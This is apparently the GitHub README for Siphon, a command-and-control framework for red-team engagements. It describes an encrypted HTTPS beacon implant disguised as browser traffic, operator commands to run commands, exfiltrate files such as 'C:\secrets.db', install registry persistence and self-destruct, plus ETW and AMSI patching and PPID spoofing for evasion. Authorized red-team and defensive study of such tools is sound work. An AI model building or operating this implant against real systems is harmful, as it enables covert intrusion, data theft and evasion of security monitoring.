Skip to content

Real-Fruit-Snacks/Siphon

BranchesTags

Repository files navigation

Siphon

Go Platform License

Lightweight C2 framework with per-session forward secrecy.

ECDH P-256 key exchange, AES-256-GCM authenticated encryption, and uTLS Chrome fingerprinting over HTTPS beacon transport. Server public key embedded at build time — zero config files on disk.

Authorization Required: Designed exclusively for authorized red team engagements with explicit written permission.

Features · Quick Start · Usage · Architecture · Security

Features

ECDH Forward Secrecy

Ephemeral P-256 key exchange per session. Server public key embedded at build time via ldflags. Shared secrets zeroed after derivation.

make implant SERVER_PK=04a1b2... C2_HOST=https://10.0.0.5:443 SLEEP_SEC=10

AES-256-GCM Transport

Authenticated encryption for all payloads. Unique nonce per message. HMAC-SHA256 covers the full envelope: ID, PubKey, Nonce, Ciphertext.

uTLS Fingerprinting

Chrome JA3 fingerprint via HelloChrome_Auto. Cookie-based beacon transport blends with normal HTTPS traffic on standard endpoints.

Operator Console

Interactive CLI with Catppuccin Mocha palette. Prefix-match implant selection, task queuing, and live result display.

siphon> implants
siphon> interact abc123
siphon(abc123)> cmd whoami
siphon(abc123)> upload C:\secrets.db
siphon(abc123)> persist registry
siphon(abc123)> selfdestruct

Implant Builder

Cross-compile Windows implants from Linux. Server public key, C2 host, sleep interval, auth token, kill date, and custom endpoints configured via build variables. Stripped with -s -w -trimpath.

make implant SERVER_PK=<hex> C2_HOST=https://c2:443 SLEEP_SEC=10 AUTH_TOKEN=secret

Quick Start

Prerequisites: Go 1.24+, Make

git clone https://github.com/Real-Fruit-Snacks/Siphon.git
cd Siphon

# Generate ECDH keypair + TLS certificate
make setup

# Build C2 server (Linux, stripped)
make server

# Build implant (Windows cross-compiled)
make implant SERVER_PK=<hex> C2_HOST=https://your-c2:443 SLEEP_SEC=10

Usage

Start the Server

./build/siphon-server \
  -listen :443 \
  -cert server/certs/server.crt \
  -key server/certs/server.key \
  -auth secret-token

Interact with Implants

siphon> implants                       # list checked-in implants
siphon> interact abc123                # select by prefix match
siphon(abc123)> cmd whoami             # execute a command
siphon(abc123)> upload C:\secrets.db   # exfiltrate a file
siphon(abc123)> download payload.exe C:\Temp\svc.exe
siphon(abc123)> sleep 30               # change beacon interval
siphon(abc123)> persist registry       # install persistence
siphon(abc123)> selfdestruct           # remove the implant

Build Targets

make setup          # Generate ECDH keypair + TLS certificate
make server         # Build C2 server (Linux amd64, stripped)
make implant        # Build implant (Windows amd64, cross-compiled)
make implant-linux  # Build implant (Linux amd64, for testing)
make clean          # Remove build artifacts and generated keys

Architecture

shared/types.go              Protocol types: Beacon, Task, TaskResult, Envelope

server/
  crypto.go                  ECDH key exchange and AES-256-GCM
  handlers.go                HTTP handlers for beacon and submit
  cli.go                     Interactive operator console
  cmd/main.go                Server entry point; TLS cert generation

implant/
  main.go                    Entry point with exponential backoff
  comms.go                   ECDH key exchange and AES-256-GCM
  transport.go               HTTPS client with uTLS Chrome fingerprint
  tasks.go                   Task dispatcher: cmd, upload, download, sleep, persist
  evasion_windows.go         PPID spoofing, CREATE_NO_WINDOW
  patches_windows.go         ETW and AMSI patching

Makefile                     Build system with ldflags configuration

Data Flow

Implant  ──  HTTPS GET /api/news (beacon)  ──▶  Server  ──▶  Task Queue
Implant  ◀──  Encrypted Task (AES-256-GCM)  ◀──  Server
Implant  ──  HTTPS POST /api/submit (result) ──▶  Server  ──▶  Loot Storage

Encryption Flow

1. Implant generates ephemeral ECDH P-256 keypair
2. Derives shared secret using server's embedded public key
3. Shared secret → AES-256-GCM key
4. All payloads encrypted with unique nonce per message
5. HMAC-SHA256 covers envelope: ID + PubKey + Nonce + Ciphertext
6. Shared secret zeroed after key derivation

Platform Support

Capability Linux (Server) Windows (Implant) Linux (Implant)
HTTPS Beacon Full Full Full
ECDH + AES-GCM Full Full Full
uTLS Fingerprint N/A Full Full
Command Execution N/A cmd.exe + PPID spoof /bin/sh
ETW Patching N/A Full Stub
AMSI Patching N/A Full Stub
PPID Spoofing N/A Full Not supported
Persistence N/A Registry, schtask, startup Stub
Self-Destruct N/A Full Stub

Security

Report vulnerabilities via GitHub Security Advisories. 90-day responsible disclosure.

Property Implementation
Forward secrecy Ephemeral ECDH P-256 per session
Payload encryption AES-256-GCM authenticated encryption
Key distribution Server public key embedded via ldflags
Message auth HMAC-SHA256 pre-shared token
Loot encryption AES-256-GCM at rest
Path traversal filepath.Base() sanitization
Binary hardening -s -w -trimpath
TLS fingerprint uTLS Chrome JA3

Siphon does not: harvest credentials, move laterally, escalate privileges, evade kernel-level EDR, destroy event logs, or generate payloads.

License

MIT — Copyright 2026 Real-Fruit-Snacks

About

Lightweight C2 framework for red team operations — ECDH P-256 forward secrecy, AES-256-GCM encryption, uTLS Chrome fingerprinting

real-fruit-snacks.github.io/Siphon/

Topics

go tls golang encryption cybersecurity penetration-testing ecdh aes-gcm infosec offensive-security red-team security-tools c2 command-and-control implant forward-secrecy c2-framework

Resources

Readme

License

MIT license

Code of conduct

Code of conduct

Contributing

Contributing

Security policy

Security policy
Activity

Stars

4 stars

Watchers

0 watching

Forks

1 fork
Report repository

Contributors

Languages